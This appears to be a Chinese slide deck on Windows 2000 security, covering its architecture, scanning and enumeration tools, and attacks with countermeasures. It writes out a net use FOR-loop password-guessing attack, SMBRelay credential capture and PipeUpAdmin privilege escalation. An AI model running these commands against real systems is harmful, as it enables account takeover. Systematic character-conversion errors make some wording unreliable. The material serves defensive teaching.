Windows2000系統(tǒng)平安(1)-網(wǎng)絡(luò)與信息平安LNWin2K平安子系統(tǒng)WindowsNT的設(shè)計(jì)從最初就考慮了平安問(wèn)題：獲得了TCSECC2認(rèn)證，這在競(jìng)爭(zhēng)劇烈的商業(yè)操作系統(tǒng)市場(chǎng)中是一個(gè)不錯(cuò)的業(yè)績(jī)Windows2000正處于一個(gè)類似的標(biāo)準(zhǔn)評(píng)估過(guò)程中，使用通用標(biāo)準(zhǔn)(CommonCriteria,CC)為了獲得更高的級(jí)別(B級(jí))，Windows2000需要在它的設(shè)計(jì)中融入一些關(guān)鍵的元素，包括(但不限于)：用于認(rèn)證的平安登錄工具可自由設(shè)定的訪問(wèn)控制審核Windows2000通過(guò)它的平安子系統(tǒng)實(shí)現(xiàn)了這些功能。圖2.1顯示了Windows2000的平安子系統(tǒng)SRM(SecurityRefrenceMonitor)SRM處于內(nèi)核模式監(jiān)視用戶模式中的應(yīng)用程序代碼發(fā)出的資源訪問(wèn)請(qǐng)求并進(jìn)行檢查所有的平安訪問(wèn)控制應(yīng)用于所有的平安主體(securityprinciple)平安主體用戶組計(jì)算機(jī)用戶帳戶賬戶是一種參考上下文，操作系統(tǒng)在這個(gè)上下文描述符運(yùn)行它的大局部代碼。換一種說(shuō)法，所有的用戶模式代碼在一個(gè)用戶賬戶的上下文中運(yùn)行。即使是那些在任何人都沒有登錄之前就運(yùn)行的代碼(例如效勞)也是運(yùn)行在一個(gè)賬戶(特殊的本地系統(tǒng)賬戶SYSTEM)的上下文中的如果用戶使用賬戶憑據(jù)(用戶名和口令)成功通過(guò)了登錄認(rèn)證，之后他執(zhí)行的所有命令都具有該用戶的權(quán)限。于是，執(zhí)行代碼所進(jìn)行的操作只受限于運(yùn)行它的賬戶所具有的權(quán)限。惡意黑客的目標(biāo)就是以盡可能高的權(quán)限運(yùn)行代碼。那么，黑客首先需要“變成〞具有最高權(quán)限的賬戶系統(tǒng)內(nèi)建帳戶用戶帳戶攻擊本地Administrator或SYSTEM賬戶是最有權(quán)力的賬戶相對(duì)于Administrator和SYSTEM來(lái)說(shuō)，所有其他的賬戶都只具有非常有限的權(quán)限因此，獲取Administrator或SYSTEM賬戶幾乎總是攻擊者的最終目標(biāo)組組是用戶賬戶集合的一種容器Windows2000具有一些內(nèi)建的組，它們是預(yù)定義的用戶容器，也具有不同級(jí)別的權(quán)限放到一個(gè)組中的所有賬戶都會(huì)繼承這些權(quán)限。最簡(jiǎn)單的一個(gè)例子是本地的Administrators組，放到該組中的用戶賬戶具有本地計(jì)算機(jī)的全部權(quán)限系統(tǒng)內(nèi)建組域中的組當(dāng)Windows2000系統(tǒng)被提升為域控制器時(shí)，同時(shí)還會(huì)安裝一系列預(yù)定義的組權(quán)限最高的預(yù)定義組包括域管理員(DomainAdmins)，它具有域中的所有權(quán)限還有企業(yè)管理員(EnterpriseAdmins)，它具有域森林的全部權(quán)限域內(nèi)建組組攻擊本地Administrator或SYSTEM賬戶是最有權(quán)力的賬戶本地Windows2000系統(tǒng)中的本地Administrators組是最有吸引力的目標(biāo)，因?yàn)檫@個(gè)組的成員繼承了相當(dāng)于管理員的權(quán)限D(zhuǎn)omainAdmins和EnterpriseAdmins是Windows2000域中最有吸引力的目標(biāo)，因?yàn)橛脩糍~戶參加到它們當(dāng)中后將會(huì)提升為具有域中的全部權(quán)限相對(duì)于Administrators、DomainAdmins和EnterpriseAdmins，所有其他的組都只具有非常有限的權(quán)限獲取Administrators、DomainAdmins和EnterpriseAdmins組中的賬戶幾乎總是攻擊者的最終目標(biāo)特殊用戶WindowsNT/2000具有一些特殊身份，它們是處于特定傳輸狀態(tài)的賬戶(例如通過(guò)網(wǎng)絡(luò)登錄)或來(lái)自于特定位置的賬戶(例如在鍵盤上進(jìn)行交互式登錄)的容器這些身份能夠用來(lái)調(diào)節(jié)對(duì)資源的訪問(wèn)控制。例如，NT/2000中對(duì)特定進(jìn)程的訪問(wèn)受限于INTERACTIVE(交互)用戶特殊用戶SAM(SecurityAccountsManager)在獨(dú)立的Windows2000計(jì)算機(jī)上，平安賬戶管理器負(fù)責(zé)保存用戶賬戶名和口令的信息口令通過(guò)散列并被加密，現(xiàn)有的技術(shù)不能將打亂的口令恢復(fù)(盡管如此，散列的口令是可以被猜出的)SAM組成了注冊(cè)表的5個(gè)配置單元之一，它在文件%systemroot%\system32\config\sam中實(shí)現(xiàn)在Windows2000域控制器上，用戶賬戶和散列的數(shù)據(jù)保存在活動(dòng)目錄中(默認(rèn)為%systemroot%\ntds\ntds.dit)。散列是以相同的格式保存的，但是要訪問(wèn)它們必須通過(guò)不同的方法SYSKEY從NT4ServicePack3開始，Microsoft提供了對(duì)SAM散列進(jìn)行進(jìn)一步加密的方法，稱為SYSKEYSYSKEY是SystemKEY的縮寫，它生成一個(gè)隨機(jī)的128位密鑰，對(duì)散列再次進(jìn)行加密(不是對(duì)SAM文件加密，而是對(duì)散列)為了啟用SYSKEY，你必須運(yùn)行SYSKEY命令，SYSKEY森林、樹、域作用域信任邊界管理域通過(guò)將一臺(tái)或幾臺(tái)Windows2000效勞器提升為域控制器，就可以很容易地創(chuàng)立Windows2000域域控制器(DomainController,DC)是共享的域信息的平安存儲(chǔ)倉(cāng)庫(kù)，同時(shí)也作為域中認(rèn)證的中央控制機(jī)構(gòu)域定義了共享賬戶的一種分布邊界。域中的所有系統(tǒng)都共用一組賬戶。在NT中，共享的域信息從主域控制器(PrimaryDC，PDC)向備份域控制器(BackupDC，BDC)進(jìn)行復(fù)制，稱為單主機(jī)復(fù)制在Windows2000域中，所有的域控制器都是對(duì)等的，它們之間進(jìn)行的域信息復(fù)制稱為多主機(jī)復(fù)制樹和森林由于Windows2000活動(dòng)目錄的實(shí)現(xiàn)，域已經(jīng)不再像NT中那樣是邏輯上的管理邊界，在活動(dòng)目錄層次中，在域之上還存在“樹〞和“森林〞的結(jié)構(gòu)樹在很大程度上只是命名上的約定，沒有太多平安上的含義，但是森林劃分了Windows2000目錄效勞的邊界，它是管理控制的根本界限作用域信任關(guān)系Windows2000可以在域間形成信任關(guān)系。信任關(guān)系只是創(chuàng)立了域間的隱含訪問(wèn)能力，但是并沒有顯式地啟用信任可以是單向的或雙向的。單向信任意味著一個(gè)域信任另一個(gè)域，反過(guò)來(lái)不存在信任。雙向信任定義了兩個(gè)域之間相互信任。單向信任通常用于允許一個(gè)域中的管理員定義對(duì)所在域的訪問(wèn)控制規(guī)那么，而相反那么不行信任關(guān)系信任可以是可傳遞的和不可傳遞的?？蓚鬟f的信任意味著如果域A傳遞信任域B，而域B傳遞信任域C，那么域A就傳遞信任域C在默認(rèn)情況下，Windows2000森林中的所有域之間都存在可傳遞的、雙向的信任Windows2000可以對(duì)森林外的域或NT4域建立單向的、不可傳遞的信任平安邊界由于森林中各個(gè)域之間自動(dòng)建立的雙向可傳遞的信任，導(dǎo)致了可以分配森林中各個(gè)域的權(quán)限的通用組的存在同一森林中其他域的管理員有奪取活動(dòng)目錄的Configuration容器的所有權(quán)并對(duì)其進(jìn)行修改的潛在能力。這種修改將會(huì)在森林中的所有域控制器上傳播。于是，對(duì)于任何參加到該森林的域來(lái)說(shuō)，你必須保證該域的域管理員能夠像其他域管理員一樣可信Windows2000森林內(nèi)部實(shí)際的平安邊界是森林域入侵的威脅假設(shè)一個(gè)黑客占領(lǐng)了一個(gè)域控制器，森林中的其他域都具有潛在的危險(xiǎn)，因?yàn)樯种腥魏斡虻腄omainAdmins都能夠獲取活動(dòng)目錄的Configuration容器的所有權(quán)并修改其中的信息，并可以將對(duì)該容器的修改復(fù)制到森林中其他的域控制器上如果任何外部域的賬戶在被攻入的域進(jìn)行認(rèn)證，那么攻擊者可以通過(guò)LSA口令緩存來(lái)偷取這些賬戶的口令，這使得他的影響擴(kuò)大到森林中的其他域如果根域被攻入，那么EnterpriseAdmins和SchemaAdmins組的成員可以對(duì)森林中的所有域進(jìn)行全面的控制，除非在此之前你已經(jīng)手動(dòng)限制了這些組的權(quán)限SIDSIDWindowNT/2000內(nèi)部對(duì)平安主體的操作是通過(guò)一個(gè)稱為平安標(biāo)識(shí)符(SecurityIdentifier，SID)的全局惟一的48位數(shù)字來(lái)進(jìn)行的SID能夠防止系統(tǒng)將來(lái)自計(jì)算機(jī)A的Administrator賬戶與來(lái)自計(jì)算機(jī)B的Administrator賬戶弄混SIDS-1-5-21-1507001333-1204550764-1011284298-500SID帶有前綴S，它的各個(gè)局部之間用連字符隔開第一個(gè)數(shù)字(本例中的1)是修訂版本編號(hào)第二個(gè)數(shù)字是標(biāo)識(shí)符頒發(fā)機(jī)構(gòu)代碼(對(duì)Windows2000來(lái)說(shuō)總是為5)然后是4個(gè)子頒發(fā)機(jī)構(gòu)代碼(本例中是21和后續(xù)的3個(gè)長(zhǎng)數(shù)字串)和一個(gè)相對(duì)標(biāo)識(shí)符(RelativeIdentifier，RID，本例中是500)SID的生成SID中的一局部是各系統(tǒng)和域惟一具有的，而另一局部(RID)是跨所有系統(tǒng)和域共享的當(dāng)安裝Windows2000時(shí)，本地計(jì)算時(shí)機(jī)頒發(fā)一個(gè)隨機(jī)的SID。類似的當(dāng)創(chuàng)立一個(gè)Windows2000域時(shí)，它也被指定一個(gè)惟一的SID。于是對(duì)任何的Windows2000計(jì)算機(jī)或域來(lái)說(shuō)，子頒發(fā)機(jī)構(gòu)代碼總是惟一的(除非成心修改或復(fù)制，例如某些底層的磁盤復(fù)制技術(shù))RIDRID對(duì)所有的計(jì)算機(jī)和域來(lái)說(shuō)都是一個(gè)常數(shù)。例如，帶有RID500的SID總是代表本地計(jì)算機(jī)的真正的Administrator賬戶。RID501是Guest賬戶在域中，從1000開始的RID代表用戶賬戶(例如，RID1015是在該域中創(chuàng)立的第14位用戶)Windows2000(或者使用適當(dāng)工具的惡意黑客)總是將具有RID500的賬戶識(shí)別為管理員其它的SIDS-1-1-0 EveryoneS-1-2-0 Interactive用戶S-1-3-0 CreatorOwnerS-1-3-1 CreatorGroup為什么不能總是使用Administrator登錄C:\>netuse\\4\ipc$password/u:AdministratorSystemerror1326hasoccurred.Logonfailure:unknownusernameorbadpassword.Windows會(huì)自動(dòng)將當(dāng)前登錄用戶的憑據(jù)提交給網(wǎng)絡(luò)登錄企圖如果用戶在客戶端上是使用Administrator登錄的，這個(gè)登錄企圖就會(huì)被解釋為客戶端希望使用本地Administrator賬戶登錄到遠(yuǎn)程系統(tǒng)當(dāng)然，這個(gè)賬戶在遠(yuǎn)程效勞器上沒有上下文你可以使用netuse命令來(lái)手動(dòng)指定登錄上下文，給出遠(yuǎn)程域、計(jì)算機(jī)名稱或IP地址和用戶名，并在用戶名前加上反斜線，例如：C:\>netuse\\4\ipc$password/u:domain\AdministratorThecommandcompletedsuccessfully.查看SIDC:\>user2sidAdministratorS-1-5-21-1507001333-1204550764-1011284298-500Numberofsubauthoritiesis5DomainisCORPC:\>sid2user521150700133312045507641011284298500NameisAdministratorDomainisCORPTypeofSIDisSidTypeUser認(rèn)證、授權(quán)和審核令牌網(wǎng)絡(luò)認(rèn)證審核登錄認(rèn)證過(guò)程首先，Windows2000必須確定自己是否在與合法的平安主體打交道。這是通過(guò)認(rèn)證實(shí)現(xiàn)的最簡(jiǎn)單的例子是通過(guò)控制臺(tái)登錄到Windows2000的用戶。用戶按下標(biāo)準(zhǔn)的CTRL+ALT+DEL組合鍵以翻開Windows2000平安登錄窗口，然后輸入賬戶名稱和口令。平安登錄窗口將輸入的憑據(jù)傳遞給負(fù)責(zé)驗(yàn)證的用戶模式組件，如Winlogon和LSASS。假設(shè)憑據(jù)是有效的，Winlogon將創(chuàng)立一個(gè)令牌(或稱訪問(wèn)令牌)，并將之綁定到用戶登錄會(huì)話上，稍后訪問(wèn)資源時(shí)需要提供令牌令牌令牌中含有與用戶賬戶有關(guān)的所有SID，包括賬戶的SID，還有該用戶所屬的所有組和特殊身份(如DomainAdmins和INERACTIVE)的SID可以使用whoami這樣的工具(包含在Windows2000ResourceKit中)來(lái)查看與登錄會(huì)話相關(guān)的SID網(wǎng)絡(luò)認(rèn)證－挑戰(zhàn)/應(yīng)答效勞器向客戶端發(fā)出一個(gè)隨機(jī)值(挑戰(zhàn)〕客戶端使用用戶口令的散列對(duì)它進(jìn)行加密散列函數(shù)運(yùn)算，并將這個(gè)新計(jì)算出的值(應(yīng)答)傳回效勞器效勞器從本地SAM或活動(dòng)目錄中取出用戶的散列，對(duì)剛發(fā)送的質(zhì)詢進(jìn)行散列運(yùn)算，并將結(jié)果與客戶端的應(yīng)答相比較于是，在WindowsNT/2000認(rèn)證過(guò)程中，沒有口令通過(guò)網(wǎng)絡(luò)傳輸，即使是以加密的形式也沒有Win2K支持的認(rèn)證方法審核審核策略：即需要記錄哪些事件LSASS在系統(tǒng)引導(dǎo)時(shí)以及策略修改時(shí)將審核策略傳遞給平安參考監(jiān)視器SRMSRM和Windows2000對(duì)象管理器一起生成審核記錄，并將它們發(fā)送給LSASSLSASS添加相關(guān)的細(xì)節(jié)(進(jìn)行訪問(wèn)的賬戶的SID等等)并將它們提交給事件日志效勞，由后者記錄到平安日志中目錄Win2K平安架構(gòu)針對(duì)Win2K的平安掃描針對(duì)Win2K的攻擊掃描工具Ping小榕流之光NetScanToolsPro2001(NSTP2001)://nwpswSuperScan://foundstone/rdlabs/tools.php?category=ScannerFscan://foundstone/rdlabs/tools.php?category=ScannerSAINTNMAP://eeye/html/Research/Tools/index.htmlNetcat(NC)NetBIOS查找工具NetViewNbtstatNbtscannetviewxDNS查找工具NetviewNslookupNltest共享資源查找工具DumpSecenumNeteSID查找工具user2sidSid2useruserinfoUserdumpGetAcctSNMP查找工具snmputilSolarWinds活動(dòng)目錄查找工具ldpSolarWinds對(duì)策在網(wǎng)絡(luò)或主機(jī)級(jí)別上，禁止對(duì)TCP和UDP端口135～139和445的訪問(wèn)禁用SMB效勞將RestrictAnonymous設(shè)置為2SMB(ServerMessageBlock,局域網(wǎng)上提供共享文件和打印機(jī)的協(xié)議〕禁用139端口在本地連接的屬性窗口中，翻開InternetProtocol(TCP/IP)的屬性，然后選擇Advanced|WINS標(biāo)簽，有一個(gè)選項(xiàng)稱為DisableNetBIOSoverTCP/IP，如下圖禁用SMB多數(shù)用戶可能會(huì)認(rèn)為禁用了TCP/IP上的NetBIOS就已經(jīng)成功地禁止了對(duì)他們的計(jì)算機(jī)的SMB訪問(wèn)。這是錯(cuò)誤的。這個(gè)設(shè)置只是禁用了NetBIOS會(huì)話效勞，即TCP端口139Windows2000在TCP445上運(yùn)行了另一個(gè)SMB監(jiān)聽程序。系統(tǒng)版本高于NT4ServicePack6a的WindowsSMB客戶端在試圖與TCP139建立連接失敗后，會(huì)自動(dòng)轉(zhuǎn)向TCP445，因此空會(huì)話仍然能夠被客戶建立，即使TCP139已經(jīng)禁用或阻塞禁用445端口翻開NetworkandDial-upConnections(網(wǎng)絡(luò)和撥號(hào)連接)，選擇Advanced菜單中的AdvancedSettings(高級(jí)設(shè)置)，然后在適當(dāng)?shù)倪m配器上取消對(duì)FileandPrinterSharingforMicrosoftNetworks(Microsoft網(wǎng)絡(luò)的文件和打印機(jī)共享)的選擇，如下圖禁用SNMP刪除SNMP代理配置為只對(duì)特定的IP地址作響應(yīng)配置為只對(duì)特定的IP地址作響應(yīng)在使用惟一的一臺(tái)管理工作站輪詢所有設(shè)備的SNMP數(shù)據(jù)的環(huán)境中，這是一種典型的配置翻開ServicesMMC|SNMPServiceProperties對(duì)話框|Security標(biāo)簽，選擇AcceptSNMPpacketsfromthesehosts單項(xiàng)選擇按鈕，并指定你的SNMP管理工作站的IP地址，如下圖目錄Win2K平安架構(gòu)針對(duì)Win2K的平安掃描針對(duì)Win2K的攻擊針對(duì)Win2K的攻擊SMB攻擊權(quán)限提升獲得交互擴(kuò)大影響去除痕跡攻擊手段猜測(cè)用戶名和密碼獲取密碼散列利用脆弱的網(wǎng)絡(luò)效勞或客戶端獲取對(duì)系統(tǒng)的物理訪問(wèn)SMB攻擊猜測(cè)SMB密碼竊聽SMB認(rèn)證攻擊前準(zhǔn)備工作關(guān)閉與目標(biāo)之間的空連接回憶掃描結(jié)果防止賬戶鎖定管理員的重要性關(guān)閉與目標(biāo)之間的空連接因?yàn)镹T/2000不支持同時(shí)使用不同的憑據(jù)進(jìn)行連接，我們必須使用netuse/delete命令注銷現(xiàn)有的與目標(biāo)之間的全部空會(huì)話(使用/y參數(shù)可以使連接關(guān)閉而不用進(jìn)行提示)：C:\>netuse*/d/y回憶掃描結(jié)果實(shí)驗(yàn)室或測(cè)試賬戶在你的環(huán)境中存在多少這樣的賬戶？其中有多少個(gè)位于本地的Administrators組中？你是否知道這樣的賬戶的密碼通常是什么在注釋字段中帶有豐富信息的用戶賬戶通過(guò)查點(diǎn)獲取的信息，見到過(guò)在這個(gè)字段中以明文的形式寫出的密碼。那些不愿意記住復(fù)雜密碼的“不幸的〞用戶經(jīng)常在注釋字段中有很多提示，其有助于密碼猜測(cè)Administrators組或DomainAdmins組的成員這些賬戶通常是攻擊者的目標(biāo)，因?yàn)樗鼈儞碛斜镜叵到y(tǒng)或域的至高無(wú)上的權(quán)限。同時(shí)，使用Microsoft的默認(rèn)工具不能鎖定本地的Administrator賬戶，這使得它成為連續(xù)密碼猜測(cè)攻擊的目標(biāo)回憶掃描結(jié)果共享的組賬戶大多數(shù)組織都傾向于在給定環(huán)境中的大局部系統(tǒng)上重用賬戶憑據(jù)。例如類似于backup(備份)或admin(管理)這樣的賬戶名稱。這些賬戶的密碼通常都比較容易猜測(cè)最近一定時(shí)期內(nèi)沒有修改正密碼的賬戶這通常說(shuō)明用戶和系統(tǒng)管理員對(duì)賬戶維護(hù)工作的不重視，有可能導(dǎo)致潛在的危險(xiǎn)。這些賬戶也可能會(huì)使用在創(chuàng)立該賬戶時(shí)指定的默認(rèn)密碼，這是很容易猜出的(通常會(huì)使用單位的名稱，或者是Welcome(歡送)等單詞〕最近一定時(shí)期內(nèi)沒有登錄過(guò)的賬戶同樣，使用頻率很低的賬戶也是維護(hù)工作的疏忽所導(dǎo)致的，它們的密碼通常也比較容易猜出防止賬戶鎖定－探測(cè)鎖定閾值Enum–pGuest帳戶猜測(cè)在Windows2000上，Guest賬戶在默認(rèn)情況下是被禁用的，但是如果你到達(dá)了鎖定閾值，你仍然能夠收到提示Guest猜測(cè)C:\>netuse\\victim\ipc$*/u:guestTypethepasswordfor\\mgmgrand\ipc$:Systemerror1326hasoccurred.Logonfailure:unknownusernameorbadpassword.C:\>netuse\\victim\ipc$*/u:guestTypethepasswordfor\\mgmgrand\ipc$:Systemerror1909hasoccurred.Thereferencedaccountiscurrentlylockedoutandmaynotbeloggedonto.Guest猜測(cè)在猜測(cè)Guest(或其他賬戶)的密碼時(shí)，需要注意的另外一件事是如果你確實(shí)猜對(duì)了一個(gè)已經(jīng)被禁用賬戶的密碼，那么將會(huì)出現(xiàn)另一種不同的錯(cuò)誤消息：C:\>netuse\\victim\ipc$*/u:guestTypethepasswordfor\\mgmgrand\ipc$:Systemerror1331hasoccurred.Logonfailure:accountcurrentlydisabled.在Windows2000中，Guest賬戶的密碼默認(rèn)為空。于是，如果你連續(xù)地以空密碼來(lái)猜測(cè)Guest賬戶，那么永遠(yuǎn)也不會(huì)到達(dá)鎖定閾值(除非密碼被人為修改正)開始攻擊猜測(cè)SMB密碼手工SMB密碼猜測(cè)C:\>netuse\\victim\ipc$password/u:victim\usernameSystemerror1326hasoccurred.Logonfailure:unknownusernameorbadpassword.可能的用戶名密碼組合使用For循環(huán)字典攻擊創(chuàng)立字典C:\>echo>credentials.txtadministrator""administratorpasswordadministratoradministrator使用For循環(huán)字典攻擊猜測(cè)C:\>FOR/F"tokens=1,2*"%iin(credentials.txt)^More?donetuse\\victim\IPC$%j/u:victim\%i^More?2>>nul^More?&&echo%time%%date%>>outfile.txt^More?&&echo\\victimacct:%ipass:%j>>outfile.txt使用For循環(huán)字典攻擊查看猜測(cè)結(jié)果C:\>typeoutfile.txt11:53:43.42Wed05/09/2001\\victimacct:administratorpass:""自動(dòng)攻擊工具NATSMBGrindFgrind

對(duì)策實(shí)施密碼復(fù)雜性要求賬戶鎖定啟用登錄失敗事件的審核查看事件日志鎖定真正的Administrator賬戶并創(chuàng)立一個(gè)假目標(biāo)禁用閑置賬戶仔細(xì)核查管理人員實(shí)施密碼復(fù)雜性要求賬戶鎖定啟用登錄失敗事件的審核查看事件日志來(lái)自Foundstone公司的NTLast來(lái)自Foundstone公司的VisualLast來(lái)自TNTSoftware公司的事件日志監(jiān)視器(ELM)來(lái)自AelitaSoftware公司的EventAdmin鎖定真正的Administrator賬戶NT4ResourceKit中提供了一個(gè)稱為passprop的工具Windows2000上運(yùn)行admnlock只能工作在安裝了SP2或更高的系統(tǒng)上，并且只有在系統(tǒng)或域設(shè)置了賬戶鎖定閾值之后才會(huì)發(fā)生作用要使用admnlock在網(wǎng)絡(luò)中鎖定真正的Administrator賬戶，運(yùn)行如下命令：

C:\>admnlock/eTheAdministratoraccountmaybelockedoutexceptforinteractive

logons查看事件日志來(lái)自Foundstone公司的NTLast來(lái)自Foundstone公司的VisualLast來(lái)自TNTSoftware公司的事件日志監(jiān)視器(ELM)來(lái)自AelitaSoftware公司的EventAdmin禁用閑置賬戶開始攻擊竊聽SMB認(rèn)證竊聽方法直接從網(wǎng)絡(luò)電纜上嗅探SMB憑據(jù)使用欺騙性效勞器捕獲SMB憑據(jù)中間人(Man-in-the-middle，MITM)攻擊LANManager的口令散列微軟在WindowsNT和2000系統(tǒng)里缺省安裝了LANManager口令散列由于LANManager使用的加密機(jī)制比微軟現(xiàn)在的方法脆弱，LANManager的口令能在很短的時(shí)間內(nèi)被破解。即使是強(qiáng)健的口令散列也能在一個(gè)月內(nèi)破解掉LANManager的口令散列機(jī)制長(zhǎng)的口令被截成14個(gè)字符短的口令被填補(bǔ)空格變成14個(gè)字符口令中所有的字符被轉(zhuǎn)換成大寫口令被分割成兩個(gè)7個(gè)字符的片斷LANManager的口令散列機(jī)制LM算法是從賬戶密碼的兩個(gè)獨(dú)立的7個(gè)字符分段創(chuàng)立用戶的散列的前8個(gè)字節(jié)來(lái)自于用戶密碼的前7個(gè)字符，隨后的8個(gè)字節(jié)來(lái)自于密碼的第8~14個(gè)字符LANManager的口令散列機(jī)制每塊都可以通過(guò)對(duì)所有可能的8字節(jié)組合進(jìn)行窮舉攻擊而猜出攻擊全部的8字節(jié)“字符空間〞對(duì)于現(xiàn)代的桌面計(jì)算機(jī)處理器來(lái)說(shuō)是很輕松的事情如果攻擊者能夠發(fā)現(xiàn)用戶的LM散列，那么他們最終破解得到實(shí)際的明文密碼就很可能了L0phtcrackL0phtcrack的局限性只能從共享介質(zhì)中捕獲質(zhì)詢-應(yīng)答通信目前還不能從兩個(gè)Windows2000系統(tǒng)間的登錄交換中獲取散列通過(guò)網(wǎng)絡(luò)監(jiān)聽破解質(zhì)詢-應(yīng)答散列所需的時(shí)間隨著添加的密碼散列數(shù)量而線性增長(zhǎng)在使用SMBCapture之前，WinPcapv2.1報(bào)文捕獲驅(qū)動(dòng)程序必須成功安裝和運(yùn)行目前還不能從NTLMv2質(zhì)詢-應(yīng)答通信中得到散列欺騙－將SMB登錄重定向到攻擊者假設(shè)攻擊者能夠欺騙用戶連接到他所指定的SMB效勞器上去，捕獲LM應(yīng)答就變得容易多L0phtcrack的早期版本中曾經(jīng)建議了一種最根本的欺騙方法：向目標(biāo)用戶發(fā)送一封電子郵件，其中嵌入假冒的SMB效勞器的超級(jí)鏈接。用戶收到這封郵件，單擊超級(jí)鏈接(手動(dòng)的或自動(dòng)的)，客戶端會(huì)在不受注意的情況下將該用戶的SMB憑據(jù)通過(guò)網(wǎng)絡(luò)發(fā)送這樣的超級(jí)鏈接很容易偽裝，而且通常只需要與用戶進(jìn)行很少的交互，因?yàn)槿绻麤]有明確提供其他認(rèn)證信息的話,Windows會(huì)自動(dòng)嘗試以當(dāng)前用戶的身份登錄對(duì)策確保遵守網(wǎng)絡(luò)平安的最正確操作準(zhǔn)那么。在受到保護(hù)的網(wǎng)絡(luò)中使用SMB效勞，確保全部的網(wǎng)絡(luò)根底設(shè)施不允許SMB通信到達(dá)不受信任的結(jié)點(diǎn)上配置網(wǎng)絡(luò)中所有的Windows系統(tǒng)，禁止LM散列在網(wǎng)絡(luò)中的傳播禁止發(fā)送LM散列使用SMBRelay捕獲SMB認(rèn)證SMBRelaySMBRelay實(shí)際上是一個(gè)SMB效勞器，它能夠從到來(lái)的SMB通信中收集用戶名和密碼散列顧名思義，SMBRelay不僅能夠?qū)崿F(xiàn)虛假的SMB終端的功能——在特定的情況下，它還能夠進(jìn)行中間人(man-in-the-middle，MITM)攻擊建立假的SMB效勞器C:\>smbrelay/ESMBRelayv0.992?TCP(NetBT)levelSMBman-in-the-middlerelayattackCopyright2001:SirDystic,CultoftheDeadCow[2]ETHERNETCSMACD?3Com10/100MiniPCIEthernetAdapter[1]SOFTWARELOOPBACK?MSTCPLoopbackinterface啟動(dòng)假的SMB效勞器C:\>smbrelay/IL2/IR2；在序號(hào)為2的網(wǎng)絡(luò)接口上建立SMBRelayv0.992?TCP(NetBT)levelSMBman-in-the-middlerelayattackCopyright2001:SirDystic,CultoftheDeadCowUsingrelayadapterindex2:3ComEtherLinkPCI等待并捕獲SMB連接Connectionfrom4:1526……Requesttype:SessionMessage137bytes……Username: "administrator"Domain: "CAESARS-TS"OS: "Windows20002195"Lanmantype: "Windows20005.0"Passwordhashwrittentodisk權(quán)限提升命名管道預(yù)測(cè)NetDDE權(quán)限提升權(quán)限提升通常是指提升當(dāng)前用戶賬戶的能力，到達(dá)具有更高權(quán)限的賬戶，通常是超級(jí)用戶，例如Administrator或SYSTEM的過(guò)程從惡意黑客的角度來(lái)說(shuō)，獲取一個(gè)普通賬戶，然后進(jìn)行權(quán)限提升攻擊，比遠(yuǎn)程進(jìn)行攻擊直接獲取超級(jí)用戶權(quán)限要容易得多不管在哪種情況下，無(wú)論他到達(dá)了什么特權(quán)級(jí)別，通過(guò)認(rèn)證的攻擊者都比未通過(guò)認(rèn)證時(shí)要有很多到達(dá)目的的選擇命名管道預(yù)測(cè)Guardent的研究員發(fā)現(xiàn)，Windows2000在使用命名管道時(shí)存在一個(gè)漏洞，這個(gè)漏洞允許任何交互式登錄的用戶模仿SYSTEM賬戶，并使用該賬戶的權(quán)限運(yùn)行任意的程序Windows2000使用可預(yù)測(cè)的命名管道用于通過(guò)效勞控制管理器(ServiceControlManager，SCM)控制效勞命名管道預(yù)測(cè)SCM使用一個(gè)惟一的命名管道用于它啟動(dòng)的每個(gè)效勞的進(jìn)程間通信。這個(gè)命名管道的格式是：\\.pipe\net\NtControlPipe12；其中12是管道編號(hào)。通過(guò)讀取注冊(cè)表主鍵HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent，攻擊者可以預(yù)測(cè)下一個(gè)命名管道將是\\.\pipe\net\NtControlPipe13命名管道預(yù)測(cè)攻擊命名管道預(yù)測(cè)攻擊利用管道編號(hào)的這種可預(yù)測(cè)性，它在SCM創(chuàng)立同名管道之前先創(chuàng)立這個(gè)管道當(dāng)一個(gè)新的效勞啟動(dòng)時(shí)，它將連接到這個(gè)惡意的管道通過(guò)命令SCM啟動(dòng)任意的一個(gè)效勞，通常是以具有高度特權(quán)的賬戶運(yùn)行的效勞，SCM將該效勞連接到惡意的管道上去。惡意的管道于是就可以模仿該效勞的平安上下文，作為SYSTEM身份或該效勞所在的任意賬戶的身份執(zhí)行命令PipeUpAdminPipeUpAdmin能夠?qū)?dāng)前用戶賬戶添加到本地的Administrtors組中，下面的例子將說(shuō)明這一點(diǎn)這個(gè)例子假設(shè)用戶wongd已經(jīng)通過(guò)了認(rèn)證，可以交互地訪問(wèn)命令控制臺(tái)wongd是ServerOperators組的一位成員PipeUpAdmin攻擊首先，wongd對(duì)全體的本地Administrators組的成員進(jìn)行檢查C:\>netlocalgroupadministratorsAliasname administratorsCommentAdministratorshavecompleteandunrestrictedaccesstothecomputer/domainMembers-----------------------------------------------------AdministratorThecommandcompletedsuccessfully.PipeUpAdmin攻擊下一步，wongd試圖將自己添加到Administrators組中，但收到了一條拒絕訪問(wèn)的錯(cuò)誤消息，因?yàn)椴痪哂凶銐虻臋?quán)限C:\>netlocalgroupadministratorswongd/addSystemerror5hasoccurred.Accessisdenied.PipeUpAdmin攻擊執(zhí)行pipeupadminC:\>pipeupadminPipeUpAdminMaceo(C)Copyright2000-2001dogmileTheClipBookserviceisnotstarted.MorehelpisavailablebytypingNETHELPMSG3521.Impersonating:SYSTEMTheaccount:FS-EVIL\wongdhasbeenaddedtotheAdministratorsgroup.PipeUpAdmin攻擊檢驗(yàn)身份C:\>netlocalgroupadministratorsAliasname AdministratorsComment Administratorshavecompleteandunrestrictedaccesstothecomputer/domainMembers-----------------------------------------------------------------AdministratorwongdThecommandcompletedsuccessfully.PipeUpAdmin攻擊退出并重新登錄，獲取administrator組用戶權(quán)限很多權(quán)限提升攻擊都需要這個(gè)過(guò)程，因?yàn)閃indows2000需要重新創(chuàng)立當(dāng)前用戶的訪問(wèn)令牌，以便參加新的組成員關(guān)系的SID作為SYSTEM身份運(yùn)行的NetDDE2001年2月，@stake的Dildog發(fā)現(xiàn)了Windows2000的網(wǎng)絡(luò)動(dòng)態(tài)數(shù)據(jù)交換效勞(NetworkDynamicDataExchangeService，NetDDE)中的一個(gè)漏洞，這個(gè)漏洞允許本地用戶以SYSTEM特權(quán)運(yùn)行任意的命令NetDDE是使應(yīng)用程序通過(guò)“受信任的共享〞來(lái)共享數(shù)據(jù)的一種技術(shù)。通過(guò)受信任的共享，可以發(fā)出請(qǐng)求執(zhí)行應(yīng)用程序，并運(yùn)行在SYSTEM